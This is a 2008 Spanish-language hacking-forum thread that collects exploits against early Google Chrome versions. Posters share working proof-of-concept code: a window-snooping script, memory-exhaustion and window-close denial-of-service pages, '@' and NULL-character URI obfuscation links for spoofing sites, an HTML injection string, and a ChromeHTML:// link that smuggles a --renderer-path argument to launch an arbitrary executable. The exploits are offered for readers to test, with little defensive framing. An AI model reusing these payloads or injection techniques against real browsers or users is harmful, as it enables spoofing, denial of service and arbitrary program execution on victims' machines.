[°] Recopilatorio de Bugs/Exploits en Google Chrome win32

MabUse · 6 Septiembre 2008, 21:59 PM

<script>
var snoopWin;

function run() {
	snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480');
	snoopWin.blur();
	setTimeout("snoopy()",1000);	
}

function snoopy() {
	alert(snoopWin.location);
	setTimeout("snoopy()", 100);
	
}
</script>



<a href="javascript:run();">http://www.google.com/</a>

But, if:

Código [Seleccionar]

<script>
var snoopWin;

function run() {
	snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480');
	snoopWin.blur();
	setTimeout("snoopy()",1000);	
}

function snoopy() {
	alert(snoopWin.location);
	setTimeout("snoopy()", 1000);
	
}
</script>



<a href="javascript:run();">http://www.google.com/</a>

berz3k · 8 Septiembre 2008, 15:11 PM

Portal dedicado a las vulnerabilidades de Chrome:

Código [Seleccionar]


Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released

Muy gracioso los comics, ademas los Chrome Easter Eggs, como todo programa oculta los credits y demas sopresas, pero tambien informacion valiosa para algun atacante:

Código [Seleccionar]


about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)

Me resulto bastante bueno al ejecutar "about:memory" la cantidad de memoria que consume Firefox comparado con Chrome.

fuente: http://chromekb.com

-berz3k.

WHK · 9 Septiembre 2008, 06:47 AM

Se ve bueno el sitio.

Código [Seleccionar]

http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1>

fuente:
http://www.jccharry.com/fake/1.txt

berz3k · 9 Septiembre 2008, 14:37 PM

Google fixea vulnerabilidades en su navegador Chrome

Google Releases New Browser Chrome - Vulnerabilities on First Day

So as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser.

It's cooled Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release.

One cool thing though is that each tab runs it's own threaded process, so if one tab bombs out it won't take down your whole browser.

The browser is a move for Google into the online/offline integration they started with Google Desktop, there are more and more online apps (Google Office) that people still want to use offline with a Google made browser this will be possible.

You also have to consider the privacy implications though, if you are also using Gmail...Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web.

Curioso video donde los ciudadanos Alemanes no usaran Chrome, lo olvide postear antes:

http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome

Abra que testear lo nuevo de Chrome.

-berz3k.

berz3k · 25 Septiembre 2008, 03:15 AM

Nuevo Exploit en milw0rm

Versiones afectadas

Chrome/0.2.149.29
Chrome/0.2.149.30

Código [Seleccionar]


<html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>

</html>

-berz3k.

berz3k · 30 Septiembre 2008, 03:37 AM

Versiones afectadas

Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

fuente:http://www.milw0rm.com/exploits/6609

Remote DoS Exploit

Código [Seleccionar]



<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>


<body onLoad="window.close();">
<center>
<b>Note: Design Flaw.Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>

berz3k · 26 Noviembre 2008, 14:03 PM

Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability.

Vulnerable Systems:
* Chrome version 0.2.149.30
* Chrome version 0.2.149.29
* Chrome version 0.2.149.27

Proof of Concept:

Link1: ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]

Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]

fuente:
http://www.secniche.org/gcuri/index.html

-berz3k.

berz3k · 27 Diciembre 2008, 12:48 PM

Nuevo Exploit 23.12.2008

Vulnerable Systems:
* Chrome version 1.0.154.36

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
fuente: http://www.milw0rm.com

Código [Seleccionar]


<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

No rula en:
Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC

-berz3k.

Novlucker · 2 Enero 2009, 15:05 PM

Bueno, menos mal que berz3k ha posteado hace algunos días, así evito tener que revivir un post viejo

Curiosidad: Alguien ha "jugado" con la versión final/estable de chrome y los fallos que se encuentran en este post?
Es que me gustaría saber si los de google han arreglado algo o estos errores permanecen

, sino tocará probar por mi mismo

Saludos

berz3k · 3 Enero 2009, 21:09 PM

@Novlucker

La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop

.

-berz3k.